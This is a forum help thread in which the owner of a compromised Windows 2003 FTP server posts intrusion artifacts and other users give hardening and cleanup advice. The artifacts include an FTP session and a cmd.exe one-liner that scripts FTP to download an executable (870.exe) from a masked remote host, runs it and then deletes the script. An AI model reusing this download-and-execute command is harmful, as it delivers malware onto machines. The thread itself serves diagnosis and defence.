FTP server - possible virus/backdoor/trojan?

I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
STEVEO5Asked:
Who is Participating?
 
Phil_AgcaoiliConnect With a Mentor Commented:
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
0
 
Kruno DžoićSystem EngineerCommented:
services.msc, and check for services with letters ftp or strange services ( use google to indentify services )
0
 
STEVEO5Author Commented:
Had a look - couldnt find anythign strange - although i noticed this command in the Start, run dialogue and I didnt type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
0
Protect Your Employees from Wi-Fi Threats

As Wi-Fi growth and popularity continues to climb, not everyone understands the risks that come with connecting to public Wi-Fi or even offering Wi-Fi to employees, visitors and guests. Download the resource kit to make sure your safe wherever business takes you!

 
Phil_AgcaoiliCommented:
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt  FTP server
- Monitor network activity just in case other systems have been compromised

0
 
maninblac1Commented:
Well, it's difficult for me to tell you exactly what's going on, it sure looks like a hack.

But the thing i can tell you is it's likely the hacker is coming from a computer that is running UNIX

UNIX (and maybe linux as well i'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data, that was a big tip off to me, is that your server is 2003 and yet it is in binary mode something odd for a windows box to my knowledge

Is this a FTP server with logon requied?  If so doesn't windows transmit FTP user/passwords in plain text so a packet sniffer could have sniffed out a login and is now accessing your FTP.

Check your logs for connections and the users who connected you may find your answers there.

In fact either this is a script, or it's definately a hack, the command flags indicate suspicious behavour, running the command then closing the prompt "cmd.exe /c" then he get's a file 870.exe off of a remote sever.  Then he does "ftp -n -s" supresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe but it appears that he deletes it before he leaves.  I'd beef up security definately.
0
 
STEVEO5Author Commented:
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet
0
 
Computer101Commented:
Forced accept.

Computer101
EE Admin
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.